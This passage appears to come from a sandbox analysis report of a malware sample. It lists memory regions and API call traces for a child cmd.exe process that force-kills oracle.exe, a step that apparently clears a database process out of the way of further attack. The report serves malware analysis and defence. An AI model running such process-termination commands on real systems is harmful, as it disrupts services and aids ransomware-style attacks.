start_va = 0x45a0000 end_va = 0x45a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 1735 start_va = 0x5cf0000 end_va = 0x6026fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1736 start_va = 0x6030000 end_va = 0x6119fff monitored = 0 entry_point = 0x606d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1737 start_va = 0x6030000 end_va = 0x6033fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006030000" filename = "" Region: id = 1738 start_va = 0x6040000 end_va = 0x611ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1739 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1740 start_va = 0x6120000 end_va = 0x6120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006120000" filename = "" Region: id = 1741 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1742 start_va = 0x6130000 end_va = 0x6130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006130000" filename = "" Region: id = 1743 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 1744 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 1745 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1746 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 1747 start_va = 0x6140000 end_va = 0x617ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006140000" filename = "" Region: id = 1748 start_va = 0x6180000 end_va = 0x61bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006180000" filename = "" Region: id = 1749 start_va = 0x61c0000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061c0000" filename = "" Region: id = 1750 start_va = 0x6200000 end_va = 0x623ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 1751 start_va = 0x6240000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" Region: id = 1752 start_va = 0x6280000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 1753 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1754 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1756 start_va = 0x62c0000 end_va = 0x62c5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000062c0000" filename = "" Thread: id = 148 os_tid = 0xb44 Thread: id = 149 os_tid = 0x950 Thread: id = 150 os_tid = 0xb04 Thread: id = 151 os_tid = 0x668 Thread: id = 152 os_tid = 0xee8 Process: id = "18" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x71420000" os_pid = "0x4b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im oracle.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1759 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1760 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1761 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1762 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1763 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1764 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1765 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1766 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1767 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1768 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1769 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 1770 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1771 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1772 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1773 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1774 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1775 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1776 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1777 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1778 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1779 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1780 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1781 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1782 start_va = 0x480000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1783 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1784 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1785 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1786 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1787 start_va = 0x480000 end_va = 0x53dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1788 start_va = 0x620000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1789 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1790 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1791 start_va = 0x720000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 1792 start_va = 0x540000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1793 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1794 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1795 start_va = 0x820000 end_va = 0xb56fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 153 os_tid = 0x12f4 [0153.420] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0153.420] __set_app_type (_Type=0x1) [0153.420] __p__fmode () returned 0x74974d6c [0153.420] __p__commode () returned 0x74975b1c [0153.420] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0153.421] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0153.421] GetCurrentThreadId () returned 0x12f4 [0153.421] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x12f4) returned 0x78 [0153.421] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0153.421] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0153.421] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.435] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0153.435] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0153.435] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.435] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0153.436] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0153.436] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.436] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0153.436] GetConsoleOutputCP () returned 0x1b5 [0153.439] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0153.439] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0153.439] _get_osfhandle (_FileHandle=1) returned 0x130 [0153.439] SetConsoleMode (hConsoleHandle=0x130, dwMode=0x0) returned 0 [0153.439] _get_osfhandle (_FileHandle=1) returned 0x130 [0153.439] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0153.439] _get_osfhandle (_FileHandle=0) returned 0x158 [0153.439] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0153.439] GetEnvironmentStringsW () returned 0x627d08* [0153.439] GetProcessHeap () returned 0x620000 [0153.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa1a) returned 0x628730 [0153.440] FreeEnvironmentStringsA (penv="A") returned 1 [0153.440] GetProcessHeap () returned 0x620000 [0153.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x4) returned 0x620588 [0153.440] GetEnvironmentStringsW () returned 0x627d08* [0153.440] GetProcessHeap () returned 0x620000 [0153.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa1a) returned 0x629158 [0153.440] FreeEnvironmentStringsA (penv="A") returned 1 [0153.440] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0153.440] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0153.440] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0153.440] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0153.440] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0153.440] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0153.441] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0153.441] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0153.441] RegCloseKey (hKey=0x88) returned 0x0 [0153.441] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0153.441] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0153.441] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0153.441] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0153.441] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0153.441] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0153.441] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0153.441] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0153.441] RegCloseKey (hKey=0x88) returned 0x0 [0153.441] time (in: timer=0x0 | out: timer=0x0) returned 0x62344207 [0153.442] srand (_Seed=0x62344207) [0153.442] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im oracle.exe \"" [0153.442] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im oracle.exe \"" [0153.442] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0153.442] GetProcessHeap () returned 0x620000 [0153.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x210) returned 0x629b80 [0153.442] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x629b88, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0153.442] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0153.442] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0153.442] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.442] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0153.442] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0153.442] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0153.442] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0153.443] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0153.443] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0153.443] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0153.443] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0153.443] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0153.443] GetProcessHeap () returned 0x620000 [0153.444] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x628730) returned 1 [0153.444] GetEnvironmentStringsW () returned 0x627d08* [0153.444] GetProcessHeap () returned 0x620000 [0153.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa32) returned 0x62a7d8 [0153.444] FreeEnvironmentStringsA (penv="A") returned 1 [0153.444] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0153.444] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.444] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0153.444] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0153.444] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0153.444] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0153.444] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0153.447] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0153.447] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0153.447] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0153.447] GetProcessHeap () returned 0x620000 [0153.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x44) returned 0x624140 [0153.447] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0153.447] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0153.447] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0153.448] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6205c8 [0153.448] FindClose (in: hFindFile=0x6205c8 | out: hFindFile=0x6205c8) returned 1 [0153.448] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x6205c8 [0153.449] FindClose (in: hFindFile=0x6205c8 | out: hFindFile=0x6205c8) returned 1 [0153.449] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0153.449] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6205c8 [0153.449] FindClose (in: hFindFile=0x6205c8 | out: hFindFile=0x6205c8) returned 1 [0153.449] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0153.449] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0153.449] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0153.449] GetProcessHeap () returned 0x620000 [0153.450] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x62a7d8) returned 1 [0153.450] GetEnvironmentStringsW () returned 0x627d08* [0153.450] GetProcessHeap () returned 0x620000 [0153.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa76) returned 0x629d98 [0153.450] FreeEnvironmentStringsA (penv="=") returned 1 [0153.450] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0153.450] GetProcessHeap () returned 0x620000 [0153.450] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x624140) returned 1 [0153.450] GetProcessHeap () returned 0x620000 [0153.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x400e) returned 0x62bc98 [0153.451] GetProcessHeap () returned 0x620000 [0153.451] RtlAllocateHeap 